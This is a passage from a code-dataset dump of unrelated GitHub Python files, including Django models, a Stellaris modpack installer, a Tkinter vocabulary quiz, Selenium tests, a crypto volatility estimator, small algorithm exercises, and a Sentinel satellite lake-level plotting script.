'Nn':\n break\nprint(f'A) A lista possui {len(lista)} valores.')\nlista2 = lista[:]\nlista2.sort(reverse=True)\nprint(f'B) A lista em ordem decresente fica assims: {lista2}.')\nprint('C) O número 5 foi digitado?', end=' ')\nif 5 in lista:\n print(f'Sim! 
Ele está na {lista2.index(5) + 1}ª posição.')\nelse:\n print('Não.')","repo_name":"sauliiin/Python-from-Padawan-to-Jedi","sub_path":"085.py","file_name":"085.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28908439481","text":"from django.db import models\r\nfrom django.utils import timezone\r\nfrom users.models import StudentsGroup\r\nfrom django_quill.fields import QuillField\r\nfrom django.contrib.auth import get_user_model\r\n\r\nUser = get_user_model()\r\n# Create your models here.\r\n\r\n\r\nclass Tasks(models.Model):\r\n \"\"\" VAZIFALAR UCHUN MODEL \"\"\"\r\n teacher = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, verbose_name=\"O'qituvchi\", related_name=\"teachers\")\r\n student = models.ForeignKey(StudentsGroup, on_delete=models.SET_NULL, null=True, verbose_name=\"Gurux nomi\", related_name=\"students_group\")\r\n title = models.CharField(max_length=500, verbose_name=\"Vazifa mavzusi\")\r\n description = QuillField(verbose_name=\"Tafsiloti\")\r\n complite = models.BooleanField(default=False, verbose_name=\"Bitdi\")\r\n order_num = models.IntegerField(default=0, verbose_name=\"Tartib raqami\")\r\n add_time = models.DateTimeField(default=timezone.now, blank=True, verbose_name=\"Vazifa berilayotgan vaqt\")\r\n complite_time = models.DateTimeField(verbose_name=\"Vazifani topshirish vaqti\")\r\n active = models.BooleanField(default=True)\r\n slug = models.SlugField(verbose_name=\"slug\", max_length=300)\r\n update_time = models.DateTimeField(auto_now=True)\r\n\r\n def __str__(self):\r\n return str(self.title)\r\n\r\n def __unicode__(self):\r\n return str(self.title)\r\n \r\n def get_comments(self):\r\n total = self.commenttasks_set.all() \r\n return total\r\n \r\n class Meta:\r\n db_table = ''\r\n managed = True\r\n ordering = [\"order_num\"]\r\n verbose_name = \"Tasks\"\r\n verbose_name_plural = \"Tasks\"\r\n\r\n\r\nclass CommentTasks(models.Model):\r\n \"\"\" VAZIFALAR UCHUN IZOHLAR \"\"\"\r\n author = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True, related_name=\"comment_authors\")\r\n to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True, related_name=\"comment_tos\")\r\n task = models.ForeignKey(Tasks, on_delete=models.SET_NULL, null=True, blank=True)\r\n comment = models.TextField(verbose_name=\"Izoh\")\r\n add_time = models.DateTimeField(auto_now_add=True)\r\n\r\n def __str__(self):\r\n return str(self.author)\r\n\r\n def __unicode__(self):\r\n return str(self.author)\r\n \r\n class Meta:\r\n db_table = ''\r\n managed = True\r\n verbose_name = \"Izohlar\"\r\n verbose_name_plural = \"Izohlar\"\r\n\r\nclass AnswerTasks(models.Model):\r\n \"\"\" JAVOBLARNI QOLDIRISH UCHUN \"\"\"\r\n student = models.ForeignKey(User, related_name=\"answer_students\", on_delete=models.SET_NULL, null=True)\r\n teacher = models.ForeignKey(User, related_name=\"task_teacher\", on_delete=models.SET_NULL, null=True)\r\n task = models.ForeignKey(Tasks, on_delete=models.SET_NULL, null=True)\r\n comment = QuillField()\r\n file = models.FileField(upload_to=\"file/answers/%Y-%m-%d/\", blank=True, null=True)\r\n checked = models.BooleanField(default=False)\r\n add_time = models.DateTimeField(auto_now_add=True)\r\n update_time = models.DateTimeField(auto_now_add=True)\r\n\r\n def __str__(self):\r\n return f\"{self.student} | {self.task}\"\r\n\r\n def __unicode__(self):\r\n return str(self.student)\r\n \r\n class Meta:\r\n db_table = \"\"\r\n 
managed = True\r\n verbose_name = \"Javoblar\"\r\n verbose_name_plural = \"Javoblar\"","repo_name":"ZohidilloPr/onlineTeacher","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72426211145","text":"import os\nimport glob\nimport json\nfrom shutil import copy2\nfrom filecmp import cmp as compare\nfrom argparse import ArgumentParser\nfrom make_mod_patch import mod_patch\n\n\ndef make_modpack(modpack_name, overwrite):\n print(\"\\nAssembling modpack...\")\n fileIndex = dict()\n whitelist = open('whitelist.txt').read().split('\\n')\n # Keep only the alphanumeric characters in the names in the whitelist, remove blank lines:\n whitelist = [''.join(char for char in list_entry if char.isalnum()) for list_entry in whitelist if list_entry]\n\n patch_created = False\n if os.path.isdir(f\"mod{os.sep}{modpack_name}\") and not overwrite:\n print(f\"The {modpack_name} directory already exists...\")\n patch_name = ''.join(char for char in modpack_name if char.isalnum()) + \"Patch\"\n if os.path.isdir(f\"mod{os.sep}{patch_name}\"):\n print(\"It looks like a modpack patch has already been created for this modpack. Checking for new changes.\")\n new_changes_present = mod_patch(modpack_name, check_only=True)\n if new_changes_present:\n print(f\"\\nIt looks like there are additional changes in your {modpack_name} folder aside from those saved in {patch_name}.\")\n print(f\"This process will abort in order to prevent loss of changes in your {modpack_name} or overwriting of files in your {patch_name} folder.\")\n print(f\"To force skip the patch creation process and overwrite files in the {modpack_name} folder, run \\\"installer.py -ovr\\\"\")\n print(f\"To force the updating of the contents of {patch_name}, run \\\"make_mod_patch.py\\\" and then run \\\"installer.py\\\" again.\")\n print(\"If the only differing files are in the modpack patch itself, you must run \\\"installer.py -ovr\\\" to push those files into the modpack.\")\n return\n else:\n print(\"There are no additional changes in the modpack aside from those already in the patch.\")\n else:\n patch_created = mod_patch(modpack_name, add_to_whitelist=False)\n print(\"Continuing to assemble modpack...\\n\")\n\n for entry in whitelist:\n fileList = glob.glob(f'mod{os.sep}{entry}{os.sep}interface{os.sep}**', recursive=True)\n for cur_file in fileList:\n if not os.path.isfile(cur_file) or \".mod\" in cur_file:\n continue # Skip directory the folders themselves and mod descriptor files.\n file_path = cur_file.split(os.sep)\n file_path[1] = modpack_name # Change folder to the modpack.\n path_within_mod = os.sep.join(file_path[2:])\n if path_within_mod in fileIndex:\n # There is already a file at this path in the modpack, it is either a conflict or a duplicate.\n if compare(cur_file, os.sep.join(file_path)):\n fileIndex[path_within_mod][0].append(f\"DUPLICATE: {entry.strip()}\")\n fileIndex[path_within_mod][2] += 1\n continue # Skip duplicate files.\n # File is a conflict:\n fileIndex[path_within_mod][0].append(f\"CONFLICT: {entry.strip()}\")\n fileIndex[path_within_mod][1] += 1\n file_path[1] = f\"{modpack_name}_conflicts!\" # Copy the conflicting file to the conflicts folder.\n fname, extension = file_path[-1].split('.')\n file_path[-1] = fname + \".\" + extension + \" \" + entry.strip() + \".\" + extension\n print(f\"Confict detected. 
Moving to {os.sep.join(file_path[1:])}.\")\n else:\n # First time we've seen a file at this path.\n # First entry in the dict is for mod source, second is for conflict count, third is for repeat count.\n fileIndex[path_within_mod] = [[(f\"SELECTED: {entry.strip()}\")], 0, 0]\n # Make dirs if necessary:\n target_path = os.sep.join(file_path)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n # Copy the mod file to its destination.\n copy2(cur_file, target_path)\n\n print(\"\\n\\nDone copying files.\")\n if fileIndex:\n with open(f'mod{os.sep}{modpack_name}{os.sep}whitelist.txt', \"w+\") as f:\n f.writelines([i +'\\n' for i in whitelist])\n\n conflicts_dict = dict()\n duplicates_dict = dict()\n for i in fileIndex:\n if fileIndex[i][1]:\n conflicts_dict[i] = fileIndex[i][0]\n if fileIndex[i][2]:\n duplicates_dict[i] = fileIndex[i][0]\n fileIndex[i] = fileIndex[i][0]\n\n # Output a list of all files.\n with open(f\"mod{os.sep}{modpack_name}{os.sep}allFilesList.txt\", \"w+\") as f:\n f.write(json.dumps(fileIndex, indent = 4))\n if duplicates_dict:\n # Output a list of duplicate files.\n with open(f\"mod{os.sep}{modpack_name}{os.sep}duplicateFilesList.txt\", \"w+\") as f:\n f.write(json.dumps(duplicates_dict, indent = 4))\n print(f\"Duplicate files listed in mod{os.sep}{modpack_name}{os.sep}duplicateFilesList.txt\")\n if conflicts_dict:\n # Output a list of conflicting files.\n with open(f\"mod{os.sep}{modpack_name}_conflicts!{os.sep}conflictingFilesList.txt\", \"w+\") as f:\n f.write(json.dumps(conflicts_dict, indent = 4))\n print(f\"Conflicting files listed in mod{os.sep}{modpack_name}_conflicts!{os.sep}conflictingFilesList.txt\")\n else:\n print(\"No conflicts!\")\n\n mod_descriptor_name = ''.join(char for char in modpack_name if char.isalnum()).capitalize()\n if not os.path.isfile(f\"mod{os.sep}{mod_descriptor_name}.mod\"):\n with open(f\"mod{os.sep}{mod_descriptor_name}.mod\", \"w+\") as f:\n f.writelines([f\"name=\\\"{modpack_name}\\\"\\n\", f\"path=\\\"mod/{modpack_name}\\\"\\n\", \"tags={\\n\", \"\\t\\\"Gameplay\\\"\\n\", \"}\\n\", \"supported_version=\\\"2.7.*\\\"\\n\"])\n\n if patch_created:\n print(\"A modpack patch was created in order to preserve the customizations in the modpack folder.\")\n print(f\"To revert the customizations to your modpack, add {patch_name} to your whitelist (at the top if you want to ensure your customizations are prioritized).\")\n print(\"Done!\")\n\n\ndef get_name_from_cl():\n parser = ArgumentParser()\n parser.add_argument('-n', '--modpack_name', default=\"! modpack\", type=str,\n help='The name of the modpack (both the folder name and the name in the stellaris launcher).')\n parser.add_argument('-ovr', '--nopatch', action='store_true', default=True,\n help=\"Add this argument to overwrite files in the mod folder without generating a patch. 
By default, \" \\\n \"modifications within the *modpack_name* folder will be saved to a new mod called *modpack_name*_patch\")\n args = parser.parse_args()\n return args.modpack_name, args.nopatch\n\n\nif __name__ == \"__main__\":\n modpack_name, overwrite = get_name_from_cl()\n print(overwrite)\n make_modpack(modpack_name, overwrite)\n","repo_name":"D4rkstalker/StellarisModpackUtility","sub_path":"old_installer.py","file_name":"old_installer.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"16099654869","text":"def selection_sort_smallest(arr):\n new_array = []\n\n for i in range(len(arr)):\n smallest = find_smallest(arr)\n new_array.append(arr.pop(smallest))\n\n return new_array\n\ndef find_smallest(arr):\n smallest = arr[0]\n smallest_index = 0\n\n for i in range(1, len(arr)):\n if arr[i] < smallest:\n smallest = arr[i]\n smallest_index = i\n\n return smallest_index\n\nif __name__ == \"__main__\":\n unordered_array = [5, 3, 6, 2, 10]\n print(\"Unordered List:\")\n print(unordered_array)\n\n sorted_smallest = selection_sort_smallest(unordered_array)\n\n print(\"Sorted List By Smallest:\")\n print(sorted_smallest)\n","repo_name":"jcornejo86/algorithms","sub_path":"algorithms/python/02_selection_sort/example_02.py","file_name":"example_02.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34107523621","text":"import sqlite3\nimport random\nfrom tkinter import Label, Button, messagebox, Entry\nfrom .status_buttons import add_buttons\nfrom crs.enums.global_enums import ButtonNames, Titles, InfoMessages\n\n\nclass WellKnownWord():\n def __init__(self, from_lang=0, to_lang=1):\n self.word_list = []\n self.from_lang = from_lang\n self.to_lang = to_lang\n\n def translate(self, frame, word_id, new_list):\n ''' очистка формы и закрепление на ней элементов\n для упражнения по переводу '''\n for widget in frame.winfo_children():\n widget.destroy()\n word = self.get_word(word_id, new_list)\n Label(\n frame, text=str(word_id) + '.' 
+ word[self.from_lang], width=30\n ).grid(row=1, column=0)\n trans = Entry(frame, width=30)\n trans.grid(row=1, column=1)\n Button(\n frame, text=ButtonNames.CHECK.value,\n command=lambda: self.check_trans(\n frame, word_id, trans.get()\n )\n ).grid(row=2, column=0, columnspan=2)\n add_buttons(frame, word)\n\n def get_word(self, word_id, new_list):\n ''' получение слова из списка '''\n word_id = word_id % 15\n if new_list:\n with sqlite3.connect('vocabulary.db') as conn:\n cursor = conn.cursor()\n word_list = cursor.execute(\n ''' Select english, russian, id FROM words_word WHERE\n is_well_known = :is_well_known ''',\n {'is_well_known': True}\n ).fetchall()\n if not word_list:\n messagebox.showinfo(\n title=Titles.OOPS.value,\n message=InfoMessages.NOT_FOUND.value\n )\n return\n random.shuffle(word_list)\n self.word_list = word_list[:15]\n if len(self.word_list) < word_id:\n return self.word_list[0]\n return self.word_list[word_id]\n\n def check_trans(self, frame, word_id, trans):\n ''' проверка перевода '''\n word_id = word_id % 15\n word = self.word_list[word_id]\n if trans not in word[self.to_lang]:\n messagebox.showinfo(\n title=Titles.ERROR.value,\n message=word[self.from_lang] + ' - ' + word[self.to_lang]\n )\n self.translate(frame, int(word_id)+1, False)\n","repo_name":"sergey87kuzin/vocabulary_gui","sub_path":"exersizes/eng_to_rus.py","file_name":"eng_to_rus.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15919793314","text":"from src.common.Pages import DataStorePage, HomePage\nfrom src.common.common import BrowserTestCase\nfrom src.data.TestData import TestData\nfrom src.data.Locators import Locators\n\n\nclass DataStoreTest(BrowserTestCase):\n def test__cookies_consent(self):\n \"\"\" Clicks on cookies consent button on Climate Data Store\n \"\"\"\n self.data_store_page = DataStorePage(self.driver)\n cookies_button = self.data_store_page.click(\n Locators.DATA_COOKIES_CONSENT)\n self.assertTrue(cookies_button, 'Cookies consent button click failed')\n\n def test_access_the_catalogue(self):\n \"\"\" Search in the Climate Data Store\n \"\"\"\n self.data_store_page = HomePage(self.driver, self.url)\n self.data_store_page.click(Locators.DATA_LINK)\n data_search_input = self.data_store_page.is_enabled(\n Locators.DATA_SEARCH_INPUT)\n data_search_input.send_keys(TestData.DS_SEARCH_TEXT)\n data_search_submit = self.data_store_page.is_enabled(\n Locators.DATA_SEARCH_SUBMIT)\n data_search_submit.click()\n self.data_store_page.wait_title(TestData.SEARCH_DS_TITLE)\n self.assertIn(TestData.SEARCH_DS_TITLE, self.data_store_page.driver.title)\n","repo_name":"IulianStave/climate_py_selenium","sub_path":"src/DataStoreTestCase.py","file_name":"DataStoreTestCase.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11987182866","text":"import numpy as np\n\nfrom django.utils import timezone\nfrom datetime import datetime, timezone, timedelta\n\nfrom okx_app.model.model_candle import ModelCandle\nfrom okx_app.model.model_currency import ModelCurrency\nfrom okx_app.model.model_exchange import ModelExchange\n\nfrom okx_app.services.volatility_historical.service_volatility_historical_estimator_interface import ServiceVolatilityHistoricalEstimatorInterface\n\n ##############################################\n # Service Calculates Vol of Vol from Candles #\n 
##############################################\n\n\nclass ServiceVolatilityHistoricalVvolEstimator(ServiceVolatilityHistoricalEstimatorInterface):\n\n def __init__(self) -> None:\n super(ServiceVolatilityHistoricalVvolEstimator, self).__init__()\n \n def estimate(self, \n instrument_term: int,\n exchange: ModelExchange,\n base_ccy: ModelCurrency, \n quote_ccy: ModelCurrency, \n window: int,\n **kwargs\n ):\n\n to_date = datetime.now(timezone.utc)\n to_date_minute = to_date.replace(second=0, microsecond=0, minute=to_date.minute)\n from_date_minute = to_date_minute - timedelta(minutes=window*2)\n candles = list(ModelCandle.objects.filter(\n exchange=exchange,\n base_ccy=base_ccy,\n quote_ccy=quote_ccy,\n date__gte=from_date_minute\n ).order_by('-date'))\n \n \n ##calculate logog returns of all candles in last 7 days (candles-1)\n returns = []\n for i in range(1, len(candles), 1):\n returns.append(np.log(candles[i].close/candles[i-1].close))\n\n ## calculate hvol over each instrument_term period in returns eg. every non-overlapping 12h(720) period in 7 days (10080) \n start= 0\n dynamic_end = 0\n end = int(window)\n\n response_list = []\n dynamic_start = max(start, dynamic_end) \n dynamic_end = max(start+int(instrument_term)*60, start)\n while end > dynamic_end:\n try:\n period_returns = returns[dynamic_start:dynamic_end]\n standard_dev = np.std(period_returns)\n periodic_annualised_vol = standard_dev*((525600)**0.5)\n response_list.append(periodic_annualised_vol)\n\n except returns == None:\n print(\"no returns\")\n if start == int(end):\n break\n dynamic_start = max(start, dynamic_start+int(instrument_term)*60)\n dynamic_end = min(end, dynamic_start+int(instrument_term)*60)\n\n vvol = np.std(response_list)\n return vvol","repo_name":"ChanrajMandok/okx_valuation","sub_path":"okx_app/services/volatility_historical/service_volatility_historical_vvol_estimator.py","file_name":"service_volatility_historical_vvol_estimator.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70553975944","text":"#write a node and linked list constructor\n#Add append method to the linked list\n\nclass Node:\n def __init__(self,value):\n self.value = value\n self.next = None\n\nclass LinkedList:\n def __init__(self,value):\n new_node =Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n def append(self,value):\n new_node =Node(value)\n # if the list is not created or empty\n if self.head == None:\n self.head = new_node\n self.tail = new_node\n else:\n # If there is a tail element from the list\n #point the tail node to the new node\n self.tail.next = new_node\n #move the tail to the new node\n self.tail =new_node\n #increase the length of the linked list\n self.length += 1\n \n \n \n\n","repo_name":"it-AVNG/DataEngineer","sub_path":"LinkedList_Execercise/excercise2.py","file_name":"excercise2.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26858713368","text":"import requests\n\ndef fetch_top_holdings():\n url = \"https://query1.finance.yahoo.com/v1/finance/quote\"\n params = {\n 'symbols': 'SPY',\n 'fields': 'topHoldings'\n }\n response = requests.get(url, params=params)\n data = response.json()\n if 'quoteResponse' in data and 'result' in data['quoteResponse']:\n result = data['quoteResponse']['result']\n if len(result) > 0 and 'topHoldings' in result[0]:\n holdings = 
result[0]['topHoldings']['holding']\n return holdings\n return []\n\ntop_holdings = fetch_top_holdings()\nprint(top_holdings)\n\n","repo_name":"8Bit3DPrints/TheGoodStuff","sub_path":"holdings.py","file_name":"holdings.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24110372567","text":"import os\n\nfrom setuptools import setup\n\ndef long_description():\n os.system('pandoc --from=markdown --to=rst --output=README.rst README.md')\n readme_fn = os.path.join(os.path.dirname(__file__), 'README.rst')\n if os.path.exists(readme_fn):\n with open(readme_fn) as f:\n return f.read()\n else:\n return 'not available'\n\nsetup(\n name='gnomecast',\n version=__import__('gnomecast').__version__,\n description='A native Linux GUI for Chromecasting local files.',\n long_description=long_description(),\n author='Derek Anderson',\n author_email='public@kered.org',\n url='https://github.com/keredson/gnomecast',\n py_modules=['gnomecast'],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: End Users/Desktop',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n install_requires=['pychromecast','bottle','pycaption','paste','html5lib'],\n data_files=[\n ('share/icons/hicolor/16x16/apps', ['icons/gnomecast_16.png']),\n ('share/icons/hicolor/48x48/apps', ['icons/gnomecast_48.png']),\n ('share/icons/hicolor/scalable/apps', ['icons/gnomecast.svg']),\n ('share/applications', ['gnomecast.desktop'])\n ],\n entry_points={\n 'gui_scripts': [\n 'gnomecast = gnomecast:main',\n ]\n }\n)\n\n\n","repo_name":"keredson/gnomecast","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1418,"dataset":"github-code","pt":"81"} +{"seq_id":"73388353866","text":"# Letter Combinations of a Phone Number\nfrom typing import List\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n if not digits: return []\n d = {'2': ['a','b','c'],\n '3': ['d','e','f'],\n '4': ['g','h','i'],\n '5': ['j','k','l'],\n '6': ['m','n','o'],\n '7': ['p','q','r','s'],\n '8': ['t','u','v'],\n '9': ['w','x','y','z'],}\n s1 = ['']\n s2 = []\n def put(f: List[List[str]], t: List[List[str]], l: List[str]):\n while f:\n tmp = f.pop()\n for c in l:\n tmp2 = list(tmp)\n tmp2.append(c)\n t.append(tmp2)\n return\n for digit in digits:\n if s1: put(s1, s2, d[digit])\n else: put(s2, s1, d[digit])\n if s1:\n s1 = [\"\".join(x) for x in s1]\n return s1\n else:\n s2 = [\"\".join(x) for x in s2]\n return s2\n\n\n\ns = Solution()\nprint(s.letterCombinations(\"2\"))","repo_name":"GavinPHR/code","sub_path":"phase3/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"42794762949","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sklearn as sk\nimport matplotlib\nimport cartopy.crs as ccrs # Projections\nimport cartopy.feature as cfeature\nimport cartopy\nimport datetime\nimport matplotlib.font_manager as fm\n\n# This file generates the plots we used in our presentation. 
It is outlined as follows:\n# - Read in the Sentinel A data for Lake Winnipeg\n# - Figure 1: Sentinel A ground tracks over Lake Winnipeg\n# - Figure 2: Outlier rejection (reject points +/- 2*sigma from the mean)\n# - Figure 3: Mean lake water levels on each day\n# - Figure 4: Kalman filtered lake water levels; superimposed on median lake water levels\n# - Figure 5: Neural network prediced lake water levels; superimposed on median lake water levels and in-situ data\n# Uses both Sentinel A and Sentinel B data\n\n# Constants for plotting\nFIG_WIDTH_INCHES = 6.5\nFIG_HEIGHT_INCHES = 6.5\nTITLE_SIZE = 15\nTICK_LABEL_SIZE = 14\nLABEL_SIZE = 14\nTEXT_COLOUR=\"w\"\n\n# Read Sentinel A Lake Winnipeg data\nsentinel_data_A = pd.read_csv(\"data/Sentinel_3A_water_level_Version0.csv\")\nsentinel_data_A = sentinel_data_A.rename(\n columns={\n \"Date (YYYYMMDD)\" : \"date\",\n \"Lake_name\" : \"lake_name\",\n \"Latitude\" : \"latitude\",\n \"Longitude\" : \"longitude\",\n \"Relaive_orbit\" : \"relative_orbit\",\n \"Lake water level (m)\" : \"lake_water_level\"\n }\n)\nlake_winnipeg = sentinel_data_A[\n sentinel_data_A[\"lake_name\"] == \"Winnipeg\"\n]\n\n####\n#### FIGURE 1: Sentinel A ground tracks over Lake Winnipeg\n####\n# Get the extent from the data\nextent = [\n lake_winnipeg[\"longitude\"].min(),\n lake_winnipeg[\"longitude\"].max(),\n lake_winnipeg[\"latitude\"].min(),\n lake_winnipeg[\"latitude\"].max(),\n]\ncentral_lon = np.mean(extent[:2])\ncentral_lat = np.mean(extent[2:])\n\n# High resolution lakes\nlakes_50m = cfeature.NaturalEarthFeature('physical', 'lakes', '10m')\n\n# Land, river, and lakes\nfig = plt.figure(figsize=(6.5, 6.6))\nax = fig.add_subplot(111, projection=ccrs.PlateCarree())\nax.set_extent(extent)\nax.add_feature(cartopy.feature.LAND, edgecolor='black')\nax.add_feature(cartopy.feature.RIVERS)\nax.add_feature(lakes_50m, facecolor='lightsteelblue',edgecolor='black')\n\n# Plot altimetry points\nax.scatter(\n x=np.array(lake_winnipeg[\"longitude\"]),\n y=np.array(lake_winnipeg[\"latitude\"]),\n zorder=10,\n s=1\n)\n\n# Set plotting stuff.\nplt.title(\n \"Sentinel A ground tracks over Lake Winnipeg\",\n fontsize=TITLE_SIZE,\n pad=20,\n color=TEXT_COLOUR\n)\nax.text(-0.22, 0.55, 'Latitude (degrees)', va='bottom', ha='center',\n rotation='vertical', rotation_mode='anchor',\n transform=ax.transAxes, fontsize=LABEL_SIZE, color=TEXT_COLOUR)\nax.text(0.5, -0.15, 'Longitude (degrees)', va='bottom', ha='center',\n rotation='horizontal', rotation_mode='anchor',\n transform=ax.transAxes, fontsize=LABEL_SIZE, color=TEXT_COLOUR)\n\n# Format gridlines\n# https://scitools.org.uk/cartopy/docs/latest/gallery/gridlines_and_labels/gridliner.html\ngl = ax.gridlines(draw_labels=True)\ngl.top_labels = False\ngl.right_labels = False\ngl.xlabel_style = {'size': TICK_LABEL_SIZE, 'color': TEXT_COLOUR}\ngl.ylabel_style = {'size': TICK_LABEL_SIZE, 'color': TEXT_COLOUR}\n\nplt.tight_layout()\nfig.savefig(\n './out/sentinel_a_ground_track.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)\n\n####\n#### Figure 2: Outlier Rejection\n####\nlake_water_mean = lake_winnipeg[\"lake_water_level\"].mean()\nlake_water_std = lake_winnipeg[\"lake_water_level\"].std()\n\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\n\n# Plot histogram of the lake water levels\nax.hist(\n x=lake_winnipeg[\"lake_water_level\"],\n bins=np.linspace(\n lake_water_mean - 5 * lake_water_std,\n lake_water_mean + 5 * lake_water_std,\n 500\n )\n)\nax.set_xlim(\n [\n lake_water_mean - 7 * lake_water_std,\n lake_water_mean + 
7 * lake_water_std,\n ]\n)\n\n# Set shaded red areas, indicating what to exlude\nax.axvspan(\n xmin=ax.get_xlim()[0],\n xmax=lake_water_mean - 2 * lake_water_std,\n facecolor=\"#F02D3A\",\n alpha=0.5\n)\nax.axvspan(\n xmin=lake_water_mean + 2 * lake_water_std,\n xmax=ax.get_xlim()[1],\n facecolor=\"#F02D3A\",\n alpha=0.5\n)\n\n# Add vertical lines at each standard deviation\nvline_water_levels = [lake_water_mean + i * lake_water_std for i in range(-2,3)]\nax.set_ylim([0, 2000.])\nax.vlines(\n x=vline_water_levels,\n ymin=0., \n ymax=2000., # hard code in 2000. here; setting ymax=ax.get_ylim()[1] isn't working properly\n color='k',\n linestyle='--',\n alpha=0.5\n)\n\n# Add thousands separator to y-axis\nax.get_yaxis().set_major_formatter(\n matplotlib.ticker.FuncFormatter(lambda x, p: format(int(x), ','))\n)\n\nax.set_xlabel(\n \"Water level (m)\",\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE,\n labelpad=20\n)\nax.set_ylabel(\n \"Number of data points\",\n fontsize=LABEL_SIZE,\n labelpad=20,\n color=TEXT_COLOUR\n)\n\n# Add upper x-axis showing mu and +/- N standard deviations\nax1 = ax.twiny()\nax1.set_xlim(\n ax.get_xlim()\n)\nax1.set_xticks(\n [lake_water_mean + i * lake_water_std for i in range(-2, 3)]\n)\nax1.set_xticklabels(\n [\n r'-2$\\sigma$',\n r'-1$\\sigma$',\n r'$\\mu$',\n r'1$\\sigma$',\n r'2$\\sigma$',\n ],\n fontsize=TICK_LABEL_SIZE,\n color=TEXT_COLOUR\n)\n\n# Set all x/y-ticks to have the right size and colour\nfor x in ax.get_xticklabels():\n x.set_fontsize(TICK_LABEL_SIZE)\n x.set_color(TEXT_COLOUR)\nfor y in ax.get_yticklabels():\n y.set_fontsize(TICK_LABEL_SIZE)\n y.set_color(TEXT_COLOUR)\n\n# Add label saying to ignore the shaded red-ares \nax.text(210, 1500, 'Ignore water\\n' + r'levels of $\\mu \\pm2\\sigma$' + '\\n(shaded)', color=TEXT_COLOUR, fontsize=13)\n\n# Set the colour of the axes\nax1.spines[\"top\"].set_color(TEXT_COLOUR)\nax1.spines[\"bottom\"].set_color(TEXT_COLOUR)\nax1.spines[\"left\"].set_color(TEXT_COLOUR)\nax1.spines[\"right\"].set_color(TEXT_COLOUR)\nax.tick_params(axis='x', colors=TEXT_COLOUR)\nax.tick_params(axis='y', colors=TEXT_COLOUR)\nax1.tick_params(axis='x', colors=TEXT_COLOUR)\n\nplt.title(\n \"Distribution of lake water levels\\nin Lake Winnipeg from Sentinel A\",\n fontsize=TITLE_SIZE,\n pad=20,\n color=TEXT_COLOUR\n)\nplt.tight_layout()\nfig.savefig(\n './out/outlier_rejection.png',\n dpi=400, \n bbox_inches='tight', \n transparent=True\n)\n\n####\n#### Figure 3: Mean lake water levels on each day\n####\n# Read in the processed data; reuse the lake_winnipeg name for the data frame\nlake_winnipeg = pd.read_csv(\"./processed/sentinel_a_lake_winnipeg_remove_outliers.csv\")\n\n# Reject outliers\nlake_winnipeg = lake_winnipeg.loc[\n lake_winnipeg[\"reject\"] == False\n]\n\nbaseline_results = lake_winnipeg[\n [\n \"date\",\n \"lake_water_level\"\n ]\n].groupby(\"date\").agg(\n {\n \"lake_water_level\" : \"median\"\n }\n).reset_index()\nbaseline_results.loc[:, \"date_as_datetime\"] = pd.to_datetime(baseline_results.loc[:, \"date\"], format=\"%Y%m%d\")\n\nfig = plt.figure(figsize=(6, 6))\nax = fig.add_subplot(111)\nax.plot(\n baseline_results[\"date_as_datetime\"],\n baseline_results[\"lake_water_level\"],\n linewidth=1.0,\n label=\"Median of each track\",\n color=\"#F55536\"\n)\nax.set_xlabel(\n 'Date',\n labelpad=20,\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE\n)\nax.set_ylabel(\n 'Lake Winnipeg water levels (m)',\n labelpad=20,\n color=TEXT_COLOUR,\n fontsize=LABEL_SIZE\n)\nplt.title(\n \"Median of lake water levels on each day\\nin Lake Winnipeg 
